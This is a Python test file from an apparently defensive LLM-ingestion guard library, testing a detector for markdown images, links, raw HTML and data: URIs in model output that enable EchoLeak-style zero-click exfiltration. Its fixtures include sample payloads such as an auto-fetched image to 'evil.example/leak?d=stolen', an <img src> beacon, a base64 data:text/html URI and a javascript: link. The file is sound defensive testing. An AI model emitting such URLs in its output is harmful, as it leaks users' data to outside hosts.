llm-ingestion-pipeline-secu.../tests/test_active_content.py
Kjell Tore Guttormsen 4d53765c63 feat(guard): active-content detector wired into the output gate (review MAJOR #1)
Close the EchoLeak wiring hole (CVE-2025-32711 class): markdown images/
links, reference definitions, autolinks, raw active HTML and data: URIs
now surface as report-only findings (active:*, OWASP LLM05) in
scan_output step 6, so screen_output and okf.import_bundle dispose of
them instead of admitting them with findings=[].

- new active_content.py: canonical home of the shared pattern table +
  scan_active_content; neutralize refactored to import it (mutating API
  and behavior unchanged, all neutralize tests pass as-is)
- images/links flagged only for absolute/protocol-relative URLs:
  relative in-bundle links are legitimate wiki/OKF mechanism (principle 5)
- evidence carries defanged URLs only (hxxps://evil[.]example)
- EchoLeak vectors planted in both showcases; detach proofs cover them
- README export list + checklist step 6, CLAUDE.md context line updated

Suite: 321 -> 341 passed. Core invariant intact (dependencies=[]).
2026-07-15 06:11:33 +02:00

166 lines
6.7 KiB
Python

"""Tests for the report-only active-content detector (review 2026-07, Session A).
``scan_active_content`` closes the EchoLeak wiring hole (CVE-2025-32711): the
active-content classes ``neutralize`` can defang — markdown images/links,
reference-link definitions, angle-bracket autolinks, raw active HTML, ``data:``
URIs — must also surface as *findings* on the standard gate, so
``screen_output`` and ``okf.import_bundle`` dispose of them instead of admitting
them silently (OWASP LLM05 — Improper Output Handling).
Report-only twin of ``neutralize`` (design principles 3 & 4): it never mutates,
and severities mirror the defanger's (image / raw-html / data-uri HIGH, links
MEDIUM). One deliberate divergence: markdown images/links are flagged only when
the URL is absolute or protocol-relative — a relative in-document link carries
no exfiltration affordance, and flagging it would silently over-block legitimate
wiki content (design principle 5: over-blocking is a failure mode).
"""
from __future__ import annotations
from llm_ingestion_guard import (
scan_active_content,
scan_output,
screen_output,
Disposition,
PRESET_USER_UPLOAD,
)
from llm_ingestion_guard.okf import import_bundle, Origin, Channel
from llm_ingestion_guard.report import Severity, Source
# The zero-click EchoLeak primitive: an auto-fetched markdown image URL.
_ECHOLEAK = "![x](https://evil.example/leak?d=stolen)"
# --- the wiring hole the review proved (Probe 1/1b/2) ------------------------
def test_markdown_image_is_reported():
report = scan_active_content(_ECHOLEAK)
img = [f for f in report.findings if f.label == "active:markdown-image"]
assert len(img) == 1
assert img[0].severity is Severity.HIGH
assert img[0].detector == "active_content"
assert img[0].owasp == "LLM05"
def test_scan_output_includes_active_content():
labels = {f.label for f in scan_output(_ECHOLEAK).findings}
assert "active:markdown-image" in labels
def test_screen_output_reports_echoleak():
# Review Probe 1: this was WARN with findings=[] — the unsafe admit.
decision = screen_output(_ECHOLEAK, PRESET_USER_UPLOAD)
assert decision.disposition is not Disposition.WARN, decision
def test_okf_import_flags_body_echoleak():
# Review Probe 2: the same payload in an OKF concept body was ADMITted.
bundle = {"note.md": "---\ntype: table\n---\n" + _ECHOLEAK + "\n"}
result = import_bundle(bundle, origin=Origin.EXTERNAL, channel=Channel.AUTOMATIC)
assert result.disposition is not Disposition.WARN, result
# --- each active-content class surfaces as a finding -------------------------
def test_inline_link_is_reported_medium():
report = scan_active_content("click [here](https://evil.example/go) now")
link = [f for f in report.findings if f.label == "active:markdown-link"]
assert len(link) == 1
assert link[0].severity is Severity.MEDIUM
def test_reference_link_definition_is_reported():
text = "See [the doc][ref].\n\n[ref]: https://evil.example/leak"
labels = {f.label for f in scan_active_content(text).findings}
assert "active:reference-link" in labels
def test_autolink_is_reported():
report = scan_active_content("read more <https://evil.example/x> here")
assert any(f.label == "active:autolink" for f in report.findings)
def test_raw_active_html_is_reported():
report = scan_active_content('<img src="https://evil.example/leak?d=x">')
html = [f for f in report.findings if f.label == "active:raw-html"]
assert len(html) == 1
assert html[0].severity is Severity.HIGH
def test_data_uri_is_reported():
report = scan_active_content("open data:text/html;base64,PHNjcmlwdD4= please")
data = [f for f in report.findings if f.label == "active:data-uri"]
assert len(data) == 1
assert data[0].severity is Severity.HIGH
# --- false-positive guards: no exfil affordance -> no finding ----------------
def test_relative_link_is_not_flagged():
# The OKF cross-link case: in-bundle links are the format's core mechanism.
report = scan_active_content("See [orders](/tables/orders.md) and [notes](./notes.md).")
assert report.found is False
def test_relative_image_is_not_flagged():
report = scan_active_content("![diagram](images/arch.png)")
assert report.found is False
def test_protocol_relative_url_is_flagged():
# `//evil.example` resolves against the rendering host's scheme — external.
report = scan_active_content("[x](//evil.example/leak)")
assert any(f.label == "active:markdown-link" for f in report.findings)
def test_dangerous_scheme_link_is_flagged():
report = scan_active_content("[x](javascript:alert(1))")
assert any(f.label == "active:markdown-link" for f in report.findings)
def test_clean_prose_has_no_findings():
text = ("A perfectly ordinary wiki paragraph. Costs $5! See section [1] below "
"(really). if a < b and c > d then see [note]. the metadata: field.")
assert scan_active_content(text).found is False
def test_benign_formatting_html_is_not_flagged():
report = scan_active_content("This is <b>strong</b> and <em>emph</em> text.")
assert report.found is False
# --- counting and evidence hygiene -------------------------------------------
def test_image_is_not_double_counted_as_link():
labels = {f.label for f in scan_active_content("![alt](https://evil.example/x)").findings}
assert "active:markdown-image" in labels
assert "active:markdown-link" not in labels
def test_autolink_is_not_double_counted_as_html():
# `<https://...?src=x>` also parses as an HTML tag with a URL attribute; the
# autolink pass must consume it first (mirrors neutralize's pass order).
report = scan_active_content("<https://evil.example/leak?src=x>")
labels = [f.label for f in report.findings]
assert labels.count("active:autolink") == 1
assert "active:raw-html" not in labels
def test_multiple_images_are_counted():
report = scan_active_content("![a](https://x.example/1) ![b](https://y.example/2)")
img = [f for f in report.findings if f.label == "active:markdown-image"][0]
assert img.count == 2
def test_evidence_never_carries_a_fetchable_url():
# Evidence is defanged (hxxps / bracketed dots): the report must be safe to
# log and render without recreating the auto-fetch affordance it flagged.
for payload in (_ECHOLEAK, '<img src="https://evil.example/leak?d=x">'):
for f in scan_active_content(payload).findings:
assert "https://" not in (f.evidence or ""), (f.label, f.evidence)
def test_default_source_is_output_and_override_respected():
assert all(f.source is Source.OUTPUT
for f in scan_active_content(_ECHOLEAK).findings)
assert all(f.source is Source.INPUT
for f in scan_active_content(_ECHOLEAK, source=Source.INPUT).findings)